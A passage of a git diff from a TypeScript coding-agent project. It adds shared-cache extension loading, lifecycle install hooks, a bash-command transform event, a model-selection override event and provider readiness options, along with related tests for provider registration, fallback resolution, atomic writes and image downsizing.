successfully load the extension + const result2 = await loadExtensions([extPath], tmpDir); + assert.equal(result2.extensions.length, 1, "load after reset should succeed with fresh jiti"); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/loader.ts b/packages/pi-coding-agent/src/core/extensions/loader.ts index 88272e87b..7e25c837d 100644 --- a/packages/pi-coding-agent/src/core/extensions/loader.ts +++ b/packages/pi-coding-agent/src/core/extensions/loader.ts @@ -42,6 +42,7 @@ import type { Extension, ExtensionAPI, ExtensionFactory, + LifecycleHookHandler, ExtensionRuntime, LoadExtensionsResult, MessageRenderer, @@ -427,6 +428,8 @@ export function createExtensionRuntime(): ExtensionRuntime { unregisterProvider: (name) => { runtime.pendingProviderRegistrations = runtime.pendingProviderRegistrations.filter((r) => r.name !== name); }, + // Stub replaced by ExtensionRunner at construction time via bindEmitMethods(). + emitBeforeModelSelect: async () => undefined, }; return runtime; @@ -463,6 +466,22 @@ function createExtensionAPI( extension.commands.set(name, { name, ...options }); }, + registerBeforeInstall(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.beforeInstall.push(handler); + }, + + registerAfterInstall(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.afterInstall.push(handler); + }, + + registerBeforeRemove(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.beforeRemove.push(handler); + }, + + registerAfterRemove(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.afterRemove.push(handler); + }, + registerShortcut( shortcut: KeyId, options: { @@ -562,17 +581,102 @@ function createExtensionAPI( runtime.unregisterProvider(name); }, + async emitBeforeModelSelect(event: Omit): Promise { + return runtime.emitBeforeModelSelect(event); + }, + events: eventBus, } as ExtensionAPI; return api; } +/** + * Heuristic patterns that indicate TypeScript syntax in a source file. 
+ * Used to detect when a .js file accidentally contains TypeScript code
+ * and provide a helpful error message instead of a cryptic parse failure.
+ */
+const TS_SYNTAX_PATTERNS: RegExp[] = [
+ // Variable type annotations: const name: string, let count: number
+ /\b(?:const|let|var)\s+\w+\s*:\s*(?:string|number|boolean|any|void|never|unknown|object|bigint|symbol|undefined|null)\b/,
+ // Parameter type annotations: (api: ExtensionAPI)
+ /\(\s*\w+\s*:\s*[A-Z]\w*/,
+ // Return type annotations: ): Promise { or ): string =>
+ /\)\s*:\s*(?:Promise|string|number|boolean|void|any|never|unknown)\b/,
+ // Interface declarations
+ /\binterface\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*\{/,
+ // Type alias declarations
+ /\btype\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*=/,
+ // Angle-bracket type assertions: <Type>value
+ /(?:as\s+\w+(?:<[^>]*>)?)\s*[;,)\]}]/,
+ // Generic type parameters on functions: function foo<T>()
+ /\bfunction\s+\w+\s*<[^>]+>/,
+ // Enum declarations
+ /\benum\s+[A-Z]\w*\s*\{/,
+];
+
+/**
+ * Check whether a source string likely contains TypeScript syntax.
+ * This is a heuristic — it may produce false positives for unusual JS,
+ * but is tuned to catch the most common TS-in-JS mistakes.
+ */
+export function containsTypeScriptSyntax(source: string): boolean {
+ return TS_SYNTAX_PATTERNS.some((pattern) => pattern.test(source));
+}
+
+/**
+ * Shared jiti instance for loading extension modules.
+ *
+ * Before this fix (#2108), each extension created a NEW jiti instance with
+ * `moduleCache: false`, causing shared dependencies (e.g. @gsd/pi-agent-core)
+ * to be recompiled for every extension — turning a ~3s parallel load into a
+ * ~15-30s serial compilation bottleneck.
+ *
+ * Using a single shared instance with `moduleCache: true` means shared modules
+ * are compiled once and reused across all extensions.
+ */
+let _extensionLoaderJiti: ReturnType<typeof createJiti> | null = null;
+
+/**
+ * Reset the shared jiti singleton so the next call to getExtensionLoaderJiti()
+ * creates a fresh instance.
This prevents memory leaks in long-running daemon + * processes (every loaded module stays cached forever) and ensures stale modules + * are not returned when extension source changes on disk. + */ +export function resetExtensionLoaderCache(): void { + _extensionLoaderJiti = null; +} + +function getExtensionLoaderJiti() { + if (!_extensionLoaderJiti) { + _extensionLoaderJiti = createJiti(import.meta.url, { + moduleCache: true, + ...getJitiOptions(), + }); + } + return _extensionLoaderJiti; +} + async function loadExtensionModule(extensionPath: string) { - const jiti = createJiti(import.meta.url, { - moduleCache: false, - ...getJitiOptions(), - }); + // Pre-compiled extension loading: if the source is .ts and a sibling .js + // file exists with matching or newer mtime, use native import() to skip + // jiti JIT compilation entirely. This is the biggest startup win for + // bundled extensions that have already been built. + if (extensionPath.endsWith(".ts")) { + const jsPath = extensionPath.replace(/\.ts$/, ".js"); + try { + const [tsStat, jsStat] = [fs.statSync(extensionPath), fs.statSync(jsPath)]; + if (jsStat.mtimeMs >= tsStat.mtimeMs) { + const module = await import(jsPath); + const factory = (module.default ?? module) as ExtensionFactory; + return typeof factory !== "function" ? 
undefined : factory; + } + } catch { + // .js file doesn't exist or stat failed — fall through to jiti + } + } + + const jiti = getExtensionLoaderJiti(); const module = await jiti.import(extensionPath, { default: true }); const factory = module as ExtensionFactory; @@ -632,6 +736,12 @@ function createExtension(extensionPath: string, resolvedPath: string): Extension commands: new Map(), flags: new Map(), shortcuts: new Map(), + lifecycleHooks: { + beforeInstall: [], + afterInstall: [], + beforeRemove: [], + afterRemove: [], + }, }; } @@ -654,6 +764,22 @@ async function loadExtension( return { extension: null, error: null }; } logExtensionTiming(extensionPath, Date.now() - start, "failed"); + + // Check if a .js file contains TypeScript syntax + if (resolvedPath.endsWith(".js")) { + try { + const source = fs.readFileSync(resolvedPath, "utf-8"); + if (containsTypeScriptSyntax(source)) { + return { + extension: null, + error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. Rename it to .ts so the loader can compile it.`, + }; + } + } catch { + // Could not read file — fall through to generic error + } + } + return { extension: null, error: `Extension does not export a valid factory function: ${extensionPath}` }; } @@ -666,6 +792,23 @@ async function loadExtension( } catch (err) { const message = err instanceof Error ? err.message : String(err); logExtensionTiming(extensionPath, Date.now() - start, "failed"); + + // Check if a .js file contains TypeScript syntax — the parse error from + // jiti/Node is often cryptic, so surface a clearer diagnostic. + if (resolvedPath.endsWith(".js")) { + try { + const source = fs.readFileSync(resolvedPath, "utf-8"); + if (containsTypeScriptSyntax(source)) { + return { + extension: null, + error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. 
Rename it to .ts so the loader can compile it.`, + }; + } + } catch { + // Could not read file — fall through to generic error + } + } + return { extension: null, error: `Failed to load extension: ${message}` }; } } @@ -834,6 +977,11 @@ function discoverExtensionsInDir(dir: string): string[] { /** * Discover and load extensions from standard locations. + * + * @deprecated Use DefaultResourceLoader.reload() instead — this function is + * not called in the GSD loading flow. Extension discovery happens through + * DefaultPackageManager.resolve() → addAutoDiscoveredResources(). Kept for + * backwards compatibility with direct pi-coding-agent consumers. */ export async function discoverAndLoadExtensions( configuredPaths: string[], diff --git a/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts new file mode 100644 index 000000000..2679feae6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts @@ -0,0 +1,81 @@ +// GSD2 — Regression test: pendingProviderRegistrations must be flushed exactly once (#3576) +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; + +/** + * This test validates that the provider preflush pattern in sdk.ts clears + * pendingProviderRegistrations after iterating, so bindCore() doesn't + * re-register the same providers. + * + * The bug: createAgentSession() iterated pendingProviderRegistrations but + * did not clear the array. Later, bindCore() replayed and registered the + * same providers again, stacking wrappers. 
+ */ + +interface ProviderEntry { + name: string; + config: Record; +} + +interface MockRuntime { + pendingProviderRegistrations: ProviderEntry[]; +} + +describe("provider registration preflush", () => { + it("clears pending registrations after preflush so bindCore does not replay", () => { + const registered: string[] = []; + const runtime: MockRuntime = { + pendingProviderRegistrations: [ + { name: "ollama", config: { type: "ollama" } }, + { name: "custom-provider", config: { type: "custom" } }, + ], + }; + + // Simulate sdk.ts preflush (lines 220-223) + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + // The fix: clear after preflush + runtime.pendingProviderRegistrations = []; + + // Simulate bindCore() flush (runner.ts lines 268-271) + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + runtime.pendingProviderRegistrations = []; + + assert.deepEqual( + registered, + ["ollama", "custom-provider"], + "each provider should be registered exactly once", + ); + }); + + it("without the fix, providers are registered twice", () => { + const registered: string[] = []; + const runtime: MockRuntime = { + pendingProviderRegistrations: [ + { name: "ollama", config: { type: "ollama" } }, + ], + }; + + // Old behavior: preflush without clearing + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + // NOT clearing — simulating the old bug + + // bindCore() replays the same queue + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + + assert.deepEqual( + registered, + ["ollama", "ollama"], + "without clearing, providers are registered twice (demonstrating the bug)", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/runner.test.ts b/packages/pi-coding-agent/src/core/extensions/runner.test.ts index b11ae2d9a..8a5dcca24 100644 --- 
a/packages/pi-coding-agent/src/core/extensions/runner.test.ts +++ b/packages/pi-coding-agent/src/core/extensions/runner.test.ts @@ -48,37 +48,37 @@ function makeThrowingExtension(eventType: string, error: Error): Extension { } describe("ExtensionRunner.emitToolCall", () => { - it("catches throwing extension handler and routes to emitError", async () => { + it("catches throwing extension handler and routes to emitError", async (t) => { const dir = mkdtempSync(join(tmpdir(), "runner-test-")); - try { - const sessionManager = SessionManager.create(dir, dir); - const authStorage = AuthStorage.create(); - const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json")); - - const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed")); - const runtime = makeMinimalRuntime(); - const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry); - - const errors: any[] = []; - runner.onError((err) => errors.push(err)); - - const event: ToolCallEvent = { - type: "tool_call", - toolCallId: "test-123", - toolName: "test_tool", - input: {}, - } as ToolCallEvent; - - const result = await runner.emitToolCall(event); - - // Should not throw — error is caught and routed to emitError - assert.equal(result, undefined); - assert.equal(errors.length, 1); - assert.equal(errors[0].error, "handler crashed"); - assert.equal(errors[0].event, "tool_call"); - assert.equal(errors[0].extensionPath, "/test/throwing-ext"); - } finally { + t.after(() => { rmSync(dir, { recursive: true, force: true }); - } + }); + + const sessionManager = SessionManager.create(dir, dir); + const authStorage = AuthStorage.create(); + const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json")); + + const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed")); + const runtime = makeMinimalRuntime(); + const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry); + + const 
errors: any[] = []; + runner.onError((err) => errors.push(err)); + + const event: ToolCallEvent = { + type: "tool_call", + toolCallId: "test-123", + toolName: "test_tool", + input: {}, + } as ToolCallEvent; + + const result = await runner.emitToolCall(event); + + // Should not throw — error is caught and routed to emitError + assert.equal(result, undefined); + assert.equal(errors.length, 1); + assert.equal(errors[0].error, "handler crashed"); + assert.equal(errors[0].event, "tool_call"); + assert.equal(errors[0].extensionPath, "/test/throwing-ext"); }); }); diff --git a/packages/pi-coding-agent/src/core/extensions/runner.ts b/packages/pi-coding-agent/src/core/extensions/runner.ts index cde7cfa57..048ad534c 100644 --- a/packages/pi-coding-agent/src/core/extensions/runner.ts +++ b/packages/pi-coding-agent/src/core/extensions/runner.ts @@ -13,6 +13,8 @@ import type { SessionManager } from "../session-manager.js"; import type { BeforeAgentStartEvent, BeforeAgentStartEventResult, + BeforeModelSelectEvent, + BeforeModelSelectResult, BeforeProviderRequestEvent, CompactOptions, ContextEvent, @@ -230,6 +232,8 @@ export class ExtensionRunner { this.cwd = cwd; this.sessionManager = sessionManager; this.modelRegistry = modelRegistry; + // Bind emit methods into the shared runtime so createExtensionAPI can delegate to them. 
+    this.runtime.emitBeforeModelSelect = (event) => this.emitBeforeModelSelect(event);
   }
 
   bindCore(actions: ExtensionActions, contextActions: ExtensionContextActions): void {
@@ -634,6 +638,24 @@ export class ExtensionRunner {
     return result;
   }
 
+  async emitBashTransform(command: string, cwd: string): Promise<string> {
+    if (!this.hasHandlers("bash_transform")) return command;
+
+    let current = command;
+    await this.invokeHandlers(
+      "bash_transform",
+      () => ({ type: "bash_transform" as const, command: current, cwd }),
+      (handlerResult) => {
+        const result = handlerResult as import("./types.js").BashTransformEventResult | undefined;
+        if (result?.command && result.command.trim()) {
+          current = result.command;
+        }
+        return { done: false }; // chain all handlers
+      },
+    );
+    return current;
+  }
+
   async emitUserBash(event: UserBashEvent): Promise<UserBashEventResult | undefined> {
     let result: UserBashEventResult | undefined;
@@ -676,6 +698,21 @@ export class ExtensionRunner {
     return currentPayload;
   }
 
+  async emitBeforeModelSelect(event: Omit<BeforeModelSelectEvent, "type">): Promise<BeforeModelSelectResult | undefined> {
+    let result: BeforeModelSelectResult | undefined;
+    await this.invokeHandlers("before_model_select", () => ({
+      type: "before_model_select" as const,
+      ...event,
+    } satisfies BeforeModelSelectEvent), (handlerResult) => {
+      if (handlerResult) {
+        result = handlerResult as BeforeModelSelectResult;
+        return { done: true }; // first override wins
+      }
+      return { done: false };
+    });
+    return result;
+  }
+
   async emitBeforeAgentStart(
     prompt: string,
     images: ImageContent[] | undefined,
diff --git a/packages/pi-coding-agent/src/core/extensions/types.ts b/packages/pi-coding-agent/src/core/extensions/types.ts
index 22b05a1a6..f4c153992 100644
--- a/packages/pi-coding-agent/src/core/extensions/types.ts
+++ b/packages/pi-coding-agent/src/core/extensions/types.ts
@@ -603,10 +603,45 @@ export interface ModelSelectEvent {
   source: ModelSelectSource;
 }
 
+/** Fired before model selection runs capability scoring. Extensions can override the selected model.
*/ +export interface BeforeModelSelectEvent { + type: "before_model_select"; + unitType: string; + unitId: string; + classification: { tier: string; reason: string; downgraded: boolean }; + taskMetadata?: Record; + eligibleModels: string[]; + phaseConfig?: { primary: string; fallbacks: string[] }; +} + +/** Result from before_model_select event handler. Return { modelId } to override selection. */ +export interface BeforeModelSelectResult { + modelId: string; +} + // ============================================================================ // User Bash Events // ============================================================================ +/** + * Fired before the bash tool executes a shell command. + * Extensions can return a transformed command string. + * All registered handlers are called in order; each receives the output of the previous. + */ +export interface BashTransformEvent { + type: "bash_transform"; + /** The command string about to be executed */ + command: string; + /** Current working directory */ + cwd: string; +} + +/** Result from bash_transform event handler */ +export interface BashTransformEventResult { + /** Replacement command string. If omitted or empty, the original command is used. */ + command?: string; +} + /** Fired when user executes a bash command via ! or !! prefix */ export interface UserBashEvent { type: "user_bash"; @@ -846,6 +881,7 @@ export type ExtensionEvent = | ToolExecutionUpdateEvent | ToolExecutionEndEvent | ModelSelectEvent + | BashTransformEvent | UserBashEvent | InputEvent | ToolCallEvent @@ -949,6 +985,33 @@ export interface RegisteredCommand { handler: (args: string, ctx: ExtensionCommandContext) => Promise; } +export type LifecycleHookScope = "user" | "project"; +export type LifecycleHookPhase = "beforeInstall" | "afterInstall" | "beforeRemove" | "afterRemove"; + +export interface LifecycleHookContext { + /** Lifecycle phase currently being executed. 
*/ + phase: LifecycleHookPhase; + /** Package source string passed to install (npm:, git:, https://, local path). */ + source: string; + /** Resolved installed package path (or resolved local path), when available for this phase. */ + installedPath?: string; + /** Where the package was installed. */ + scope: LifecycleHookScope; + /** Current working directory for the install invocation. */ + cwd: string; + /** Whether install is running in an interactive TTY. */ + interactive: boolean; + /** Info-level logging sink for install output. */ + log(message: string): void; + /** Warning-level logging sink for install output. */ + warn(message: string): void; + /** Error-level logging sink for install output. */ + error(message: string): void; +} + +export type LifecycleHookHandler = (ctx: LifecycleHookContext) => Promise | void; +export type LifecycleHookMap = Record; + // ============================================================================ // Extension API // ============================================================================ @@ -1000,10 +1063,19 @@ export interface ExtensionAPI { on(event: "tool_execution_update", handler: ExtensionHandler): void; on(event: "tool_execution_end", handler: ExtensionHandler): void; on(event: "model_select", handler: ExtensionHandler): void; + on(event: "bash_transform", handler: ExtensionHandler): void; on(event: "tool_call", handler: ExtensionHandler): void; on(event: "tool_result", handler: ExtensionHandler): void; on(event: "user_bash", handler: ExtensionHandler): void; on(event: "input", handler: ExtensionHandler): void; + on(event: "before_model_select", handler: ExtensionHandler): void; + + // ========================================================================= + // Event Emission (for host extensions that orchestrate model selection) + // ========================================================================= + + /** Emit before_model_select event. Returns override model ID or undefined. 
*/ + emitBeforeModelSelect(event: Omit): Promise; // ========================================================================= // Tool Registration @@ -1019,6 +1091,18 @@ export interface ExtensionAPI { /** Register a custom command. */ registerCommand(name: string, options: Omit): void; + /** Register a lifecycle hook run before package installation starts. */ + registerBeforeInstall(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run after package installation completes. */ + registerAfterInstall(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run before package removal starts. */ + registerBeforeRemove(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run after package removal completes. */ + registerAfterRemove(handler: LifecycleHookHandler): void; + /** Register a keyboard shortcut. */ registerShortcut( shortcut: KeyId, @@ -1201,6 +1285,11 @@ export interface ExtensionAPI { /** Configuration for registering a provider via pi.registerProvider(). */ export interface ProviderConfig { + /** Auth behavior for provider availability and request key handling. Defaults to "apiKey". */ + authMode?: "apiKey" | "oauth" | "externalCli" | "none"; + /** Optional readiness check. Return false if the provider cannot accept requests (e.g., CLI not authenticated, API key invalid). + * Called before default auth checks. Trusted at the same level as extension code — extensions already have arbitrary code execution. */ + isReady?: () => boolean; /** Base URL for the API endpoint. Required when defining models. */ baseUrl?: string; /** API key or environment variable name. Required when defining models (unless oauth provided). */ @@ -1252,6 +1341,8 @@ export interface ProviderModelConfig { headers?: Record; /** OpenAI compatibility settings. */ compat?: Model["compat"]; + /** Opaque provider-specific options (e.g. Ollama keep_alive, num_gpu). */ + providerOptions?: Record; } /** Extension factory function type. 
Supports both sync and async initialization. */ @@ -1302,6 +1393,8 @@ export interface ExtensionRuntimeState { */ registerProvider: (name: string, config: ProviderConfig) => void; unregisterProvider: (name: string) => void; + /** Emit before_model_select event to all registered handlers. Bound by ExtensionRunner. */ + emitBeforeModelSelect: (event: Omit) => Promise; } /** @@ -1382,6 +1475,7 @@ export interface Extension { commands: Map; flags: Map; shortcuts: Map; + lifecycleHooks: LifecycleHookMap; } /** Result of loading extensions. */ diff --git a/packages/pi-coding-agent/src/core/extensions/wrapper.ts b/packages/pi-coding-agent/src/core/extensions/wrapper.ts index b8d050dfc..d328f7610 100644 --- a/packages/pi-coding-agent/src/core/extensions/wrapper.ts +++ b/packages/pi-coding-agent/src/core/extensions/wrapper.ts @@ -44,6 +44,15 @@ export function wrapToolWithExtensions(tool: AgentTool, runner: Exten signal?: AbortSignal, onUpdate?: AgentToolUpdateCallback, ) => { + // For bash tool calls, let extensions transform the command before execution + if (tool.name === "bash" && runner.hasHandlers("bash_transform")) { + const input = params as { command?: string; cwd?: string }; + if (typeof input.command === "string") { + const transformed = await runner.emitBashTransform(input.command, input.cwd ?? 
""); + params = { ...params, command: transformed }; + } + } + // Emit tool_call event - extensions can block execution if (runner.hasHandlers("tool_call")) { try { diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts index c62f5d473..f454d1c8e 100644 --- a/packages/pi-coding-agent/src/core/fallback-resolver.test.ts +++ b/packages/pi-coding-agent/src/core/fallback-resolver.test.ts @@ -38,6 +38,7 @@ function createResolver(overrides?: { enabled?: boolean; isProviderAvailable?: (provider: string) => boolean; hasAuth?: (provider: string) => boolean; + isProviderRequestReady?: (provider: string) => boolean; find?: (provider: string, modelId: string) => Model | undefined; }) { const settingsManager = { @@ -60,6 +61,7 @@ function createResolver(overrides?: { if (provider === "openai" && modelId === "gpt-4.1") return openaiModel; return undefined; }), + isProviderRequestReady: overrides?.isProviderRequestReady ?? overrides?.hasAuth ?? 
(() => true), } as unknown as ModelRegistry; return { resolver: new FallbackResolver(settingsManager, authStorage, modelRegistry), authStorage }; @@ -122,9 +124,9 @@ describe("FallbackResolver — findFallback", () => { assert.equal(result, null); }); - it("skips providers without auth", async () => { + it("skips providers that are not request-ready", async () => { const { resolver } = createResolver({ - hasAuth: (provider: string) => provider !== "alibaba", + isProviderRequestReady: (provider: string) => provider !== "alibaba", }); const result = await resolver.findFallback(zaiModel, "quota_exhausted"); @@ -133,6 +135,17 @@ describe("FallbackResolver — findFallback", () => { assert.equal(result!.model.provider, "openai"); }); + it("allows fallback to external-cli style providers without stored auth", async () => { + const { resolver } = createResolver({ + hasAuth: () => false, + isProviderRequestReady: (provider: string) => provider === "alibaba", + }); + + const result = await resolver.findFallback(zaiModel, "quota_exhausted"); + assert.notEqual(result, null); + assert.equal(result!.model.provider, "alibaba"); + }); + it("skips providers with no model in registry", async () => { const { resolver } = createResolver({ find: (provider: string, modelId: string) => { diff --git a/packages/pi-coding-agent/src/core/fallback-resolver.ts b/packages/pi-coding-agent/src/core/fallback-resolver.ts index 5d6b61499..e390f2038 100644 --- a/packages/pi-coding-agent/src/core/fallback-resolver.ts +++ b/packages/pi-coding-agent/src/core/fallback-resolver.ts @@ -149,9 +149,8 @@ export class FallbackResolver { const model = this.modelRegistry.find(entry.provider, entry.model); if (!model) continue; - // Check if API key is available - const hasAuth = this.authStorage.hasAuth(entry.provider); - if (!hasAuth) continue; + // Check if provider is request-ready for fallback (authMode-aware) + if (!this.modelRegistry.isProviderRequestReady(entry.provider)) continue; return { model, diff --git 
a/packages/pi-coding-agent/src/core/fs-utils.test.ts b/packages/pi-coding-agent/src/core/fs-utils.test.ts index 997080e4c..6c20beba1 100644 --- a/packages/pi-coding-agent/src/core/fs-utils.test.ts +++ b/packages/pi-coding-agent/src/core/fs-utils.test.ts @@ -1,66 +1,54 @@ import assert from "node:assert/strict"; -import { describe, it } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, readFileSync, rmSync, existsSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; import { atomicWriteFileSync } from "./fs-utils.js"; describe("atomicWriteFileSync", () => { - it("writes file content atomically", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "hello world"); - assert.equal(readFileSync(filePath, "utf-8"), "hello world"); - } finally { + let dir: string; + + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("writes file content atomically", () => { + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "hello world"); + assert.equal(readFileSync(filePath, "utf-8"), "hello world"); + }); + it("overwrites existing file atomically", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "first"); - atomicWriteFileSync(filePath, "second"); - assert.equal(readFileSync(filePath, "utf-8"), "second"); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "first"); + atomicWriteFileSync(filePath, "second"); + assert.equal(readFileSync(filePath, "utf-8"), "second"); }); it("does not leave .tmp file after successful write", () => { - const dir = 
mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "content"); - assert.equal(existsSync(filePath + ".tmp"), false); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "content"); + assert.equal(existsSync(filePath + ".tmp"), false); }); it("supports Buffer content", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.bin"); - const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]); - atomicWriteFileSync(filePath, buf); - const result = readFileSync(filePath); - assert.deepEqual(result, buf); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.bin"); + const buf = Buffer.from([0x00, 0x01, 0x02, 0xff]); + atomicWriteFileSync(filePath, buf); + const result = readFileSync(filePath); + assert.deepEqual(result, buf); }); it("supports encoding parameter", () => { - const dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); - try { - const filePath = join(dir, "test.txt"); - atomicWriteFileSync(filePath, "utf8 content", "utf-8"); - assert.equal(readFileSync(filePath, "utf-8"), "utf8 content"); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + dir = mkdtempSync(join(tmpdir(), "fs-utils-test-")); + const filePath = join(dir, "test.txt"); + atomicWriteFileSync(filePath, "utf8 content", "utf-8"); + assert.equal(readFileSync(filePath, "utf-8"), "utf8 content"); }); }); diff --git a/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts new file mode 100644 index 000000000..de075c280 --- /dev/null +++ b/packages/pi-coding-agent/src/core/image-overflow-recovery.test.ts @@ -0,0 +1,228 @@ +import assert from 
"node:assert/strict"; +import { describe, it } from "node:test"; +import { + isImageDimensionError, + MANY_IMAGE_MAX_DIMENSION, + downsizeConversationImages, +} from "./image-overflow-recovery.js"; +import type { Message } from "@gsd/pi-ai"; + +// ─── isImageDimensionError ──────────────────────────────────────────────────── + +describe("isImageDimensionError", () => { + it("returns true for Anthropic many-image dimension error", () => { + const errorMessage = + 'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"messages.125.content.38.image.source.base64.data: At least one of the image dimensions exceed max allowed size for many-image requests: 2000 pixels"}}'; + assert.equal(isImageDimensionError(errorMessage), true); + }); + + it("returns true for bare dimension exceed message", () => { + const errorMessage = + "image dimensions exceed max allowed size for many-image requests: 2000 pixels"; + assert.equal(isImageDimensionError(errorMessage), true); + }); + + it("returns false for unrelated 400 error", () => { + const errorMessage = + 'Error: 400 {"type":"error","error":{"type":"invalid_request_error","message":"max_tokens: 4096 > 2048"}}'; + assert.equal(isImageDimensionError(errorMessage), false); + }); + + it("returns false for rate limit error", () => { + assert.equal(isImageDimensionError("429 rate limit exceeded"), false); + }); + + it("returns false for empty string", () => { + assert.equal(isImageDimensionError(""), false); + }); + + it("returns false for undefined", () => { + assert.equal(isImageDimensionError(undefined), false); + }); +}); + +// ─── MANY_IMAGE_MAX_DIMENSION ───────────────────────────────────────────────── + +describe("MANY_IMAGE_MAX_DIMENSION", () => { + it("is less than 2000 (the API-enforced limit)", () => { + assert.ok(MANY_IMAGE_MAX_DIMENSION < 2000); + }); + + it("is a positive integer", () => { + assert.ok(MANY_IMAGE_MAX_DIMENSION > 0); + assert.equal(MANY_IMAGE_MAX_DIMENSION, 
Math.floor(MANY_IMAGE_MAX_DIMENSION)); + }); +}); + +// ─── helpers ────────────────────────────────────────────────────────────────── + +function makeUserMsg(content: Message["content"] & any): Message { + return { role: "user", content, timestamp: Date.now() } as Message; +} + +function makeAssistantMsg(text: string): Message { + return { + role: "assistant", + content: [{ type: "text", text }], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-6", + usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "stop", + timestamp: Date.now(), + } as Message; +} + +function makeToolResultMsg(images: number): Message { + const content: any[] = []; + for (let i = 0; i < images; i++) { + content.push({ type: "image", data: `img${i}`, mimeType: "image/png" }); + } + return { + role: "toolResult", + toolCallId: `tc${Math.random()}`, + toolName: "screenshot", + content, + isError: false, + timestamp: Date.now(), + } as Message; +} + +// ─── downsizeConversationImages ─────────────────────────────────────────────── + +describe("downsizeConversationImages", () => { + it("counts images in user and toolResult messages", () => { + const messages: Message[] = [ + makeUserMsg([ + { type: "image", data: "img1", mimeType: "image/png" }, + { type: "image", data: "img2", mimeType: "image/png" }, + ]), + makeAssistantMsg("I see them"), + makeToolResultMsg(1), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 3); + }); + + it("returns processed=false when no images present", () => { + const messages: Message[] = [ + makeUserMsg("just text"), + makeAssistantMsg("reply"), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 0); + assert.equal(result.processed, false); + }); + + it("returns processed=false when image count <= RECENT_IMAGES_TO_KEEP", () => { + const 
messages: Message[] = [ + makeUserMsg([ + { type: "image", data: "img1", mimeType: "image/png" }, + ]), + makeAssistantMsg("got it"), + ]; + + const result = downsizeConversationImages(messages); + assert.equal(result.imageCount, 1); + assert.equal(result.processed, false); + }); + + it("strips older images when many images present, preserves recent ones", () => { + const messages: Message[] = []; + for (let i = 0; i < 25; i++) { + messages.push( + makeUserMsg([ + { type: "text", text: `message ${i}` }, + { type: "image", data: `img${i}`, mimeType: "image/png" }, + ]), + ); + messages.push(makeAssistantMsg(`reply ${i}`)); + } + + const result = downsizeConversationImages(messages); + assert.ok(result.processed); + assert.equal(result.imageCount, 25); + assert.equal(result.strippedCount, 20); // 25 - 5 recent + + // Count remaining images + let remainingImages = 0; + for (const msg of messages) { + if (msg.role === "assistant") continue; + if (typeof msg.content === "string") continue; + const arr = msg.content as any[]; + for (const block of arr) { + if (block.type === "image") remainingImages++; + } + } + assert.equal(remainingImages, 5, "Should keep exactly 5 most recent images"); + + // The 5 most recent user messages (indices 40,42,44,46,48) should have images + for (let i = 20; i < 25; i++) { + const userMsg = messages[i * 2]; // user messages at even indices + const arr = userMsg.content as any[]; + const hasImage = arr.some((c: any) => c.type === "image"); + assert.ok(hasImage, `Recent message ${i} should retain its image`); + } + }); + + it("adds text placeholder when stripping an 